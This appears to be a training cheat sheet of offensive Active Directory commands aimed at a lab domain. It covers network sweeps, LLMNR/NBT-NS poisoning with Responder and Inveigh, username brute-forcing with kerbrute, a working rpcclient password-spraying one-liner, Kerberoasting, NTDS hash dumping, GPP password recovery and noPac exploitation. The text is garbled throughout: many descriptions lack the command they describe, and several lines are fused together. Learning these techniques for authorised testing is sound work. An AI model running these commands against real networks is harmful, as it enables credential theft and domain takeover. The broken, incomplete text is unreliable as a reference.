Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host.
sudo tcpdump -i ens224
Used to start capturing network packets on the network interface proceeding the `-i` option a Linux-based host.
sudo responder -I ens224 -A
Used to start responding to & analyzing `LLMNR`, `NBT-NS` and `MDNS` queries on the interface specified proceeding the `-I` option and operating in `Passive Analysis` mode which is activated using `-A`. Performed from a Linux-based host
fping -asgq 172.16.5.0/23
Performs a ping sweep on the specified network segment from a Linux-based host.
sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum
Performs an nmap scan that with OS detection, version detection, script scanning, and traceroute enabled (`-A`) based on a list of hosts (`hosts.txt`) specified in the file proceeding `-iL`. Then outputs the scan results to the file specified after the `-oN`option. Performed from a Linux-based host
sudo git clone https://github.com/ropnop/kerbrute.gitUses git to clone the kerbrute tool from a Linux-based host.make help
Used to list compiling options that are possible with `make` from a Linux-based host.
sudo make all
Used to compile a `Kerbrute` binary for multiple OS platforms and CPU architectures.
./kerbrute_linux_amd64
Used to test the chosen complied `Kebrute` binary from a Linux-based host.
Runs the Kerbrute tool to discover usernames in the domain (`INLANEFREIGHT.LOCAL`) specified proceeding the `-d` option and the associated domain controller specified proceeding `--dc`using a wordlist and outputs (`-o`) the results to a specified file. Performed from a Linux-based host.
ACL Enumeration & Tactics
Find-InterestingDomainAcl
PowerView tool used to find object ACLs in the target Windows domain with modification rights set to non-built in objects from a Windows-based host.
Used to find all Windows domain objects that the user has rights over by mapping the user's `SID` to the `SecurityIdentifier` property from a Windows-based host.
A `foreach loop` used to retrieve ACL information for each domain user in a target Windows domain by feeding each list of a text file(`ad_users.txt`) to the `Get-ADUser` cmdlet, then enumerates access rights of those users. Performed from a Windows-based host.
PowerView tool used to add a specifc user (`damundsen`) to a specific security group (`Help Desk Level 1`) in a target Windows domain from a Windows-based host.
PowerView tool used to view the members of a specific security group (`Help Desk Level 1`) and output only the username of each member (`Select MemberName`) of the group from a Windows-based host.
PowerView based tool used to search for the `DONT_REQ_PREAUTH` value across in user accounts in a target Windows domain. Performed from a Windows-based host.
Enumerates users in a target Windows domain and automatically retrieves the `AS` for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and attempts to discover more users (`--users`) in a target Windows domain. Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and attempts to discover groups (`--groups`) in a target Windows domain. Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and attempts to check for a list of logged on users (`--loggedon-users`) on the target Windows host. Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and attempts to discover any smb shares (`--shares`). Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and utilizes the CrackMapExec module (`-M`) `spider_plus` to go through each readable share (`Dev-share`) and list all readable files. The results are outputted in `JSON`. Performed from a Linux-based host.
Enumerates the target Windows domain using valid credentials and lists shares & permissions available on each within the context of the valid credentials used and the target Windows host (`-H`). Performed from a Linux-based host.
Enumerates the target Windows domain using valid credentials and performs a recursive listing (`-R`) of the specified share (`SYSVOL`) and only outputs a list of directories (`--dir-only`) in the share. Performed from a Linux-based host.
rpcclient $> queryuser 0x457
Enumerates a target user account in a Windows domain using its relative identifier (`0x457`). Performed from a Linux-based host.
rpcclient $> enumdomusers
Discovers user accounts in a target Windows domain and their associated relative identifiers (`rid`). Performed from a Linux-based host.
Impacket tool used to connect to the `CLI` of a Windows target via the `ADMIN$` administrative share with valid credentials. Performed from a Linux-based host.
Executes the python implementation of BloodHound (`bloodhound.py`) with valid credentials and specifies a name server (`-ns`) and target Windows domain (`inlanefreight.local`) as well as runs all checks (`-c all`). Runs using valid credentials. Performed from a Linux-based host.
Used to create a variable called SID that is set equal to the SID of a user account. Then uses PowerView tool `Get-ObjectAcl` to check a specific user's replication rights. Performed from a Windows-based host.
Impacket tool sed to extract NTLM hashes from the NTDS.dit file hosted on a target Domain Controller (`172.16.5.5`) and save the extracted hashes to an file (`inlanefreight_hashes`). Performed from a Linux-based host.
PowerShell cmd-let used to view `AppLocker` policies from a Windows-based host.
$ExecutionContext.SessionState.LanguageMode
PowerShell script used to discover the `PowerShell Language Mode` being used on a Windows-based host. Performed from a Windows-based host.
Find-LAPSDelegatedGroups
A `LAPSToolkit` function that discovers `LAPS Delegated Groups` from a Windows-based host.
Find-AdmPwdExtendedRights
A `LAPSTookit` function that checks the rights on each computer with LAPS enabled for any groups with read access and users with `All Extended Rights`. Performed from a Windows-based host.
Get-LAPSComputers
A `LAPSToolkit` function that searches for computers that have LAPS enabled, discover password expiration and can discover randomized passwords. Performed from a Windows-based host.
Tool used to decrypt a captured `group policy preference password` from a Linux-based host.
crackmapexec smb -L | grep gpp
Locates and retrieves a `group policy preference password` using `CrackMapExec`, the filters the output using `grep`. Peformed from a Linux-based host.
Locates and retrieves any credentials stored in the `SYSVOL` share of a Windows target using `CrackMapExec` from a Linux-based host.
Get-DomainGPO | select displayname
PowerView tool used to enumerate GPO names in a target Windows domain from a Windows-based host.
Get-GPO -All | Select DisplayName
PowerShell cmd-let used to enumerate GPO names. Performed from a Windows-based host.
$sid=Convert-NameToSid "Domain Users"
Creates a variable called `$sid` that is set equal to the `Convert-NameToSid` tool and specifies the group account `Domain Users`. Performed from a Windows-based host.
PowerView tool that is used to check if the `Domain Users` (`eq $sid`) group has any rights over one or more GPOs. Performed from a Windows-based host.
PowerShell cmd-let used to enumerate user accounts on a target Windows domain and filter by `ServicePrincipalName`. Performed from a Windows-based host.
Get-ADTrust -Filter *
PowerShell cmd-let used to enumerate any trust relationships in a target Windows domain and filters by any (`-Filter *`). Performed from a Windows-based host.
Get-ADGroup -Filter * | select name
PowerShell cmd-let used to enumerate groups in a target Windows domain and filters by the name of the group (`select name`). Performed from a Windows-based host.
Get-ADGroup -Identity "Backup Operators"
PowerShell cmd-let used to search for a specifc group (`-Identity "Backup Operators"`). Performed from a Windows-based host.
Get-ADGroupMember -Identity "Backup Operators"
PowerShell cmd-let used to discover the members of a specific group (`-Identity "Backup Operators"`). Performed from a Windows-based host.
Export-PowerViewCSV
PowerView script used to append results to a `CSV` file. Performed from a Windows-based host.
ConvertTo-SID
PowerView script used to convert a `User` or `Group` name to it's `SID`. Performed from a Windows-based host.
Get-DomainSPNTicket
PowerView script used to request the kerberos ticket for a specified service principal name (`SPN`). Performed from a Windows-based host.
Get-Domain
PowerView script used tol return the AD object for the current (or specified) domain. Performed from a Windows-based host.
Get-DomainController
PowerView script used to return a list of the target domain controllers for the specified target domain. Performed from a Windows-based host.
Get-DomainUser
PowerView script used to return all users or specific user objects in AD. Performed from a Windows-based host.
Get-DomainComputer
PowerView script used to return all computers or specific computer objects in AD. Performed from a Windows-based host.
Get-DomainGroup
PowerView script used to eturn all groups or specific group objects in AD. Performed from a Windows-based host.
Get-DomainOU
PowerView script used to search for all or specific OU objects in AD. Performed from a Windows-based host.
Find-InterestingDomainAcl
PowerView script used to find object `ACLs` in the domain with modification rights set to non-built in objects. Performed from a Windows-based host.
Get-DomainGroupMember
PowerView script used to return the members of a specific domain group. Performed from a Windows-based host.
Get-DomainFileServer
PowerView script used to return a list of servers likely functioning as file servers. Performed from a Windows-based host.
Get-DomainDFSShare
PowerView script used to return a list of all distributed file systems for the current (or specified) domain. Performed from a Windows-based host.
Get-DomainGPO
PowerView script used to return all GPOs or specific GPO objects in AD. Performed from a Windows-based host.
Get-DomainPolicy
PowerView script used to return the default domain policy or the domain controller policy for the current domain. Performed from a Windows-based host.
Get-NetLocalGroup
PowerView script used to enumerate local groups on a local or remote machine. Performed from a Windows-based host.
Get-NetLocalGroupMember
PowerView script enumerate members of a specific local group. Performed from a Windows-based host.
Get-NetShare
PowerView script used to return a list of open shares on a local (or a remote) machine. Performed from a Windows-based host.
Get-NetSession
PowerView script used to return session information for the local (or a remote) machine. Performed from a Windows-based host.
Test-AdminAccess
PowerView script used to test if the current user has administrative access to the local (or a remote) machine. Performed from a Windows-based host.
Find-DomainUserLocation
PowerView script used to find machines where specific users are logged into. Performed from a Windows-based host.
Find-DomainShare
PowerView script used to find reachable shares on domain machines. Performed from a Windows-based host.
Find-InterestingDomainShareFile
PowerView script that searches for files matching specific criteria on readable shares in the domain. Performed from a Windows-based host.
Find-LocalAdminAccess
PowerView script used to find machines on the local domain where the current user has local administrator access Performed from a Windows-based host.
Get-DomainTrust
PowerView script that returns domain trusts for the current domain or a specified domain. Performed from a Windows-based host.
Get-ForestTrust
PowerView script that returns all forest trusts for the current forest or a specified forest. Performed from a Windows-based host.
Get-DomainForeignUser
PowerView script that enumerates users who are in groups outside of the user's domain. Performed from a Windows-based host.
Get-DomainForeignGroupMember
PowerView script that enumerates groups with users outside of the group's domain and returns each foreign member. Performed from a Windows-based host.
Get-DomainTrustMapping
PowerView script that enumerates all trusts for current domain and any others seen. Performed from a Windows-based host.
PowerView script used to list all the members of a target group (`"Domain Admins"`) through the use of the recurse option (`-Recurse`). Performed from a Windows-based host.
PowerView script used to find users on the target Windows domain that have the `Service Principal Name` set. Performed from a Windows-based host.
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
Runs a tool called `Snaffler` against a target Windows domain that finds various kinds of data in shares that the compromised account has access to. Performed from a Windows-based host.
Kerberoasting
sudo python3 -m pip install .
Used to install Impacket from inside the directory that gets cloned to the attack host. Performed from a Linux-based host.
GetUserSPNs.py -h
Impacket tool used to display the options and functionality of `GetUserSPNs.py` from a Linux-based host.
Impacket tool used to download/request a TGS ticket for a specific user account and write the ticket to a file (`-outputfile sqldev_tgs`) linux-based host.
Used to request/download TGS tickets for accounts with the `admin` count set to `1` then formats the output in an easy to view & crack manner (`/nowrap`) . Performed from a Windows-based host.
.\Rubeus.exe kerberoast /user:testspn /nowrap
Used to request/download a TGS ticket for a specific user (`/user:testspn`) the formats the output in an easy to view & crack manner (`/nowrap`). Performed from a Windows-based host.
PowerView tool used to check the `msDS-SupportedEncryptionType` attribute associated with a specific user account (`testspn`). Performed from a Windows-based host.
Uses `hashcat` to crack `NTLMv2` (`-m`) hashes that were captured by responder and saved in a file (`frond_ntlmv2`). The cracking is done based on a specified wordlist.
Import-Module .\Inveigh.ps1
Using the `Import-Module` PowerShell cmd-let to import the Windows-based tool `Inveigh.ps1`.
(Get-Command Invoke-Inveigh).Parameters
Used to output many of the options & functionality available with `Invoke-Inveigh`. Peformed from a Windows-based host.
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Starts `Inveigh` on a Windows-based host with LLMNR & NBNS spoofing enabled and outputs the results to a file.
.\Inveigh.exe
Starts the `C#` implementation of `Inveigh` from a Windows-based host.
Uses `CrackMapExec`and valid credentials (`avazquez:Password123`) to enumerate the password policy (`--pass-pol`) from a Linux-based host.
rpcclient -U "" -N 172.16.5.5
Uses `rpcclient` to discover information about the domain through `SMB NULL` sessions. Performed from a Linux-based host.
rpcclient $> querydominfo
Uses `rpcclient` to enumerate the password policy in a target Windows domain from a Linux-based host.
enum4linux -P 172.16.5.5
Uses `enum4linux` to enumerate the password policy (`-P`) in a target Windows domain from a Linux-based host.
enum4linux-ng -P 172.16.5.5 -oA ilfreight
Uses `enum4linux-ng` to enumerate the password policy (`-P`) in a target Windows domain from a Linux-based host, then presents the output in YAML & JSON saved in a file proceeding the `-oA` option.
Uses `enum4linux` to discover user accounts in a target Windows domain, then leverages `grep` to filter the output to just display the user from a Linux-based host.
Uses `ldapsearch` to discover users in a target Windows doman, then filters the output using `grep` to show only the `sAMAccountName` from a Linux-based host.
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
Uses the python tool `windapsearch.py` to discover users in a target Windows domain from a Linux-based host.
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Bash one-liner used to perform a password spraying attack using `rpcclient` and a list of users (`valid_users.txt`) from a Linux-based host. It also filters out failed attempts to make the output cleaner.
Uses `CrackMapExec` and a list of users (`valid_users.txt`) to perform a password spraying attack against a target Windows domain from a Linux-based host. It also filters out logon failures using `grep`.
Uses `CrackMapExec` and the -`-local-auth` flag to ensure only one login attempt is performed from a Linux-based host. This is to ensure accounts are not locked out by enforced password policies. It also filters out logon failures using `grep`.
Import-Module .\DomainPasswordSpray.ps1
Used to import the PowerShell-based tool `DomainPasswordSpray.ps1` from a Windows-based host.
PowerView based tool to used to enumerate the `Remote Desktop Users` group on a Windows target (`-ComputerName ACADEMY-EA-MS01`) from a Windows-based host.
PowerView based tool to used to enumerate the `Remote Management Users` group on a Windows target (`-ComputerName ACADEMY-EA-MS01`) from a Windows-based host.
Uses the PowerShell cmd-let `Enter-PSSession` to establish a PowerShell session with a target over the network (`-ComputerName ACADEMY-EA-DB01`) from a Windows-based host. Authenticates using credentials made in the 2 commands shown prior (`$cred` & `$password`).
evil-winrm -i 10.129.201.234 -u forend
Used to establish a PowerShell session with a Windows target from a Linux-based host using `WinRM`.
Import-Module .\PowerUpSQL.ps1Used to import the PowerUpSQL tool.Get-SQLInstanceDomain
PowerUpSQL tool used to enumerate SQL server instances from a Windows-based host.
Used to exploit the `noPac`/`Sam_The_Admin` vulnerability and perform a `DCSync` attack against the built-in Administrator account on a Domain Controller from a Linux-based host.
Transfering Files
`sudo python3 -m http.server 8001`
Starts a python web server for quick hosting of files. Performed from a Linux-basd host.